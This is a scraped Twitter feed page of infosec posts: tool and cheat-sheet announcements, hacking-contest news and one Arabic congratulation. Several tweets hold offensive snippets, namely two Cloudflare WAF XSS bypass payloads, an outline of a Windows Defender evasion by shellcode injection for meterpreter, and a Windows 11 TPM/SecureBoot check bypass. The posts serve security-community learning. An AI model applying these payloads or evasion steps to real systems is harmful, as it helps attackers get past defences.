🥷Ninjutsu Project

العصامي أ. سلمان بن سهيل بت يفوز بجائزة #عصاميون2022 بموسمها الرابع عن مسار أفضل شخصية عصامية ريادية لعام 2022. ألف مبروكpic.twitter.com/bKKq7tn8hX

I've updated the Antivirus Event Analysis Cheat Sheet to v1.9.0 - updates in all sections - MS Exchange exploitation related indicators - updated identifiers Could @SophosLabs please fix the spelling of Webshel+l? https://www.nextron-systems.com/2022/02/06/antivirus-event-analysis-cheat-sheet-v1-9-0/ …pic.twitter.com/9ytjLmhOrM

Cloudflare #XSS WAF Bypass @nav1n0x Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F It's an ongoing program, so I had to mask the URL. #bugbountytips #infosec #CloudflareWAF #WAFBypasspic.twitter.com/0IiKCaZrfT

A UEFI file with 4 Executable files hidden in the anonymous section #MoonBounce #Malware #infosec #pestudiopic.twitter.com/FcF4Dt55NA

Meet Salla CLI v1.0.0 Extend the power of http://salla.dev  to the comfort of your Terminal. Salla CLI is a command-line interface for easy, fast building to Salla Apps. Made with by the Saudi pioneer eCommerce platform, Salla. Find more: http://github.com/SallaApp/Salla-CLI ….pic.twitter.com/uA9wG4by69

Security Professionals Responsibilities Cheat-sheet Credit @rafeeq_rehman #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #infosec #itsecurity #CyberAttack #Pentesting #hackingpic.twitter.com/hDAzyqn3zw

A curated list of Frida resources! https://github.com/dweinstein/awesome-frida … #frida #android #cybersecurity #bughuntingpic.twitter.com/zD4rtx9hAa

Log4j Vulnerability Cheatsheet How It Works Test Environments Challenges & Labs (Rooms) Where Payloads can be Injected What Information can be Extracted How To Identify (Services & Scanners)pic.twitter.com/cGQwhnH7a7

Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices WriteUp https://medium.com/@clong/introducing-detection-lab-61db34bed6ae … Code https://github.com/clong/DetectionLab … #infosec #pentest #blueteam #redteampic.twitter.com/abxjhay4mj

Nuclei v2.5.3 is now released, and it includes a number of new features and bug fixes. The complete changelog is available at -https://github.com/projectdiscovery/nuclei/releases/tag/v2.5.3 … #appsec #pentest #bugbounty #hackwithautomationpic.twitter.com/NmsPLmOyp8

#windows11 Defender bypass (worked for #meterpreter): - basic sandbox evasion - decrypt encrypted shellcode to memory - create process in suspended state - copy shellcode into allocated mem in remote process - create remote thread that's all. no need for special arsenal. :)pic.twitter.com/YZNB6sV0mN

universal CloudFlare XSS bypass @xhzeem <svg on onload=(alert)(document.domain)> https://waf.cumulusfire.net/?globalHtml=%3Csvg%20on%20onload=(alert)(document.domain)%3E …pic.twitter.com/urbBnsk9eH

This year's Tianfu Cup saw successful exploits against: -Windows 10 -iOS 15 -Ubuntu 20 -Chrome -Safari -Microsoft Exchange -Docker -VMWare ESXi/Workspace -qemu -ASUS routers -Parallels VM https://therecord.media/windows-10-ios-15-ubuntu-chrome-fall-at-chinas-tianfu-hacking-contest/ …pic.twitter.com/ly8nSLvYwv

#windows11 setup hardware requirements bypass (e.g. for VirtualBox): add reg dwords - BypassSecureBootCheck=1 and - BypassTPMCheck=1 in HKLM\SYSTEM\Setup\LabConfig key. run cmd.exe during install: Shift+F10. (just a reminder for me, now this can be read in a lot of places)pic.twitter.com/EcanA72os1